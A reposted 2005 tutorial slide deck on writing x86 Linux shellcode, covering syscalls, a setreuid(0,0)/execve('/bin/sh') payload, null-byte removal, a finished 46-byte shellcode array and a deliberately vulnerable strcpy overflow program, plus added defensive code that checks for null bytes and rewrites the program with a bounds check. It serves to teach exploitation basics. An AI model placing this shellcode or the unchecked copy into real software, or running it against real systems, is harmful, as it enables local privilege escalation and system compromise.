Basic Shell Code [repost]

Published: 2007-7-04 12:06 | Author: admin | Views: 13

Basic Shell Code
dany@chroot.org
2005/02/19

Common Assembly Instructions
- mov <dest>, <src>
- add <dest>, <src> ; sub <dest>, <src>
- push <target> ; pop <target>
- jmp <address>
- call <address>
- lea <dest>, <src>
- int <value>

Linux System Calls
- /usr/include/asm/unistd.h (excerpt):

    #ifndef _ASM_I386_UNISTD_H_
    #define _ASM_I386_UNISTD_H_
    /*
     * This file contains the system call numbers.
     */
    #define __NR_restart_syscall 0
    #define __NR_exit            1
    #define __NR_write           4
    #define __NR_execve         11

Hello world
- Uses the write and exit system calls
- EAX holds the system call number; EBX, ECX and EDX carry its arguments
- int 0x80 then hands control to the kernel

hello.asm#1
    ; section declaration
    section .data
    msg db "hello, world!"

hello.asm#2
    ; code section and entry point, needed to assemble and link:
    ;   nasm -f elf hello.asm && ld -m elf_i386 -o hello hello.o
    section .text
    global _start
_start:
    ; write call
    mov eax, 4      ; write is syscall #4
    mov ebx, 1      ; fd 1 = stdout
    mov ecx, msg    ; address of the message
    mov edx, 13     ; string length
    int 0x80        ; call the kernel

hello.asm#3
    ; exit() call
    mov eax, 1      ; exit is syscall #1
    mov ebx, 0      ; exit status 0
    int 0x80        ; call the kernel

Shell-Spawning Code#1
    ; setreuid(uid_t ruid, uid_t euid)
    mov eax, 70     ; setreuid is syscall #70
    mov ebx, 0      ; ruid = 0
    mov ecx, 0      ; euid = 0
    int 0x80
    ; setreuid(0, 0);

Shell-Spawning Code#2
    section .data
    filepath db "/bin/shXAAAABBBB"
    ; execve(const char *path, char *const argv[], char *const envp[]);
    mov eax, 0          ; put 0 into eax
    mov ebx, filepath   ; put the address of the string into ebx
    mov [ebx+7], al     ; write a 0 byte over the X (NUL-terminates "/bin/sh")
    mov [ebx+8], ebx    ; put the address of the string where AAAA was (argv[0])
    mov [ebx+12], eax   ; put NULL where BBBB was (argv[1] / envp)

Shell-Spawning Code#3
    mov eax, 11         ; execve is syscall #11
    ; load the address of where the AAAA was into ecx (argv)
    lea ecx, [ebx+8]
    ; load the address of where the BBBB was into edx (envp)
    lea edx, [ebx+12]
    int 0x80
- The last two arguments of execve(), argv and envp, are pointers to arrays of pointers, which is why ecx and edx receive the addresses of the AAAA and BBBB slots rather than the string address itself.

Avoiding Using Other Segments
    jmp two
one:
    pop ebx             ; ebx = address of the string pushed by call
    <program code here>
two:
    call one            ; pushes the address of the next byte, i.e. the string
    db 'this is a string'

Removing Null Bytes
    mov ebx, 0          ; immediate encodes as 00 00 00 00
    xor ebx, ebx        ; same result, no null bytes

    mov eax, 70         ; encodes as B8 46 00 00 00
    xor eax, eax
    mov al, 70          ; same result, no null bytes

Result shell code
- nasm shellcode.asm (default output format is a flat binary named shellcode)
- hexedit shellcode (read the raw bytes out of it)

    char shellcode[] =
    "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
    "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
    "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
    "\x68";
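As an added check that is not part of the original slides, the C program below scans a byte string for embedded 0x00 bytes and reports how much of it a strcpy()-style copy would actually transfer before stopping at the first NUL. It is run over the 46-byte array from the "Result shell code" slide and over the B8 46 00 00 00 encoding from the "Removing Null Bytes" slide; both byte sequences are copied from the slides, while the function names and the report() helper are my own.

```c
#include <stddef.h>
#include <stdio.h>

/* Byte string copied from the "Result shell code" slide above (46 bytes). */
static const unsigned char page_shellcode[] =
    "\x31\xc0\xb0\x46\x31\xdb\x31\xc9\xcd\x80\xeb\x16\x5b\x31\xc0"
    "\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\xb0\x0b\x8d\x4b\x08\x8d"
    "\x53\x0c\xcd\x80\xe8\xe5\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73"
    "\x68";
/* Drop the string literal's own terminating NUL from the length. */
#define PAGE_SHELLCODE_LEN (sizeof(page_shellcode) - 1)

/* Encoding of "mov eax, 70" from the "Removing Null Bytes" slide. */
static const unsigned char mov_eax_imm32[] = { 0xb8, 0x46, 0x00, 0x00, 0x00 };

/* Its null-free replacement: "xor eax, eax" followed by "mov al, 70". */
static const unsigned char xor_eax_mov_al[] = { 0x31, 0xc0, 0xb0, 0x46 };

/* Number of 0x00 bytes inside buf[0..len). */
int count_null_bytes(const unsigned char *buf, size_t len)
{
    int n = 0;
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0x00)
            n++;
    return n;
}

/* Offset of the first 0x00 byte, or -1 when the buffer is null-free. */
long first_null_offset(const unsigned char *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (buf[i] == 0x00)
            return (long)i;
    return -1;
}

/* How many bytes a C-string copy such as strcpy() would transfer: it
 * stops at the first NUL, so the whole buffer arrives only when there
 * is no null byte in it. */
size_t bytes_copied_by_strcpy(const unsigned char *buf, size_t len)
{
    long off = first_null_offset(buf, len);
    return off < 0 ? len : (size_t)off;
}

/* Print one line per buffer with the three measurements above. */
static void report(const char *name, const unsigned char *buf, size_t len)
{
    printf("%-16s len=%zu nulls=%d first_null=%ld strcpy_copies=%zu\n",
           name, len, count_null_bytes(buf, len),
           first_null_offset(buf, len), bytes_copied_by_strcpy(buf, len));
}

int main(void)
{
    report("page_shellcode", page_shellcode, PAGE_SHELLCODE_LEN);
    report("mov eax,70", mov_eax_imm32, sizeof mov_eax_imm32);
    report("xor/mov al", xor_eax_mov_al, sizeof xor_eax_mov_al);
    return 0;
}
```

The point of the check is the one the slide makes: the five-byte mov eax, 70 encoding would be cut to two bytes by any NUL-terminated copy, while the four-byte xor/mov al form and the final 46-byte array survive intact.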

vuln.c & exploit.c
    #include <stdlib.h>
    #include <string.h>   /* declares strcpy(); missing in the slide */
    int main(int argc, char* argv[])
    {
        char buffer[500];
        strcpy(buffer, argv[1]);   /* no length check: argv[1] longer than 499 bytes overflows buffer */
        return 0;
    }
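The vuln.c above places no bound on what strcpy() writes into buffer. As an added example that is not from the original deck, here is the same program rewritten around a length-checked copy that refuses any argument that does not fit in the 500-byte buffer together with its terminating NUL; the function names and the repeat_a() helper that builds test input are my own.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define BUF_SIZE 500   /* same buffer size as vuln.c on the slide */

/* Hardened replacement for the strcpy() in vuln.c: reject any source that
 * does not fit in dst together with its terminating NUL.
 * Returns the number of bytes copied, or -1 if src was rejected. */
long copy_arg_checked(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    if (n >= dstsz)
        return -1;               /* would overflow: leave dst untouched */
    memcpy(dst, src, n + 1);     /* n bytes plus the NUL */
    return (long)n;
}

/* Equivalent of vuln.c's main() body built on the checked copy.
 * Returns the copied length, or -1 when the argument is rejected. */
long handle_argument(const char *arg)
{
    char buffer[BUF_SIZE];
    if (arg == NULL)
        return -1;               /* vuln.c also never checks argc */
    return copy_arg_checked(buffer, sizeof buffer, arg);
}

/* Constructed test input: a string of n repeated 'A' characters
 * (capped at 1023 so it fits the static scratch buffer). */
const char *repeat_a(size_t n)
{
    static char tmp[1024];
    if (n >= sizeof tmp)
        n = sizeof tmp - 1;
    memset(tmp, 'A', n);
    tmp[n] = '\0';
    return tmp;
}

int main(int argc, char *argv[])
{
    long r = handle_argument(argc > 1 ? argv[1] : NULL);
    if (r < 0) {
        fprintf(stderr, "argument rejected\n");
        return 1;
    }
    printf("copied %ld bytes\n", r);
    return 0;
}
```

The length test happens before anything is written, so an oversized argument cannot reach the stack frame at all; a 499-byte argument is the longest one accepted.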

etc…
- Smaller shellcode using the stack
- Printable ASCII instructions
- ASCII printable polymorphic shellcode
- Shellcode for other systems

Thanks
Questions?

Article source: 领测软件测试网 https://www.ltesting.net/

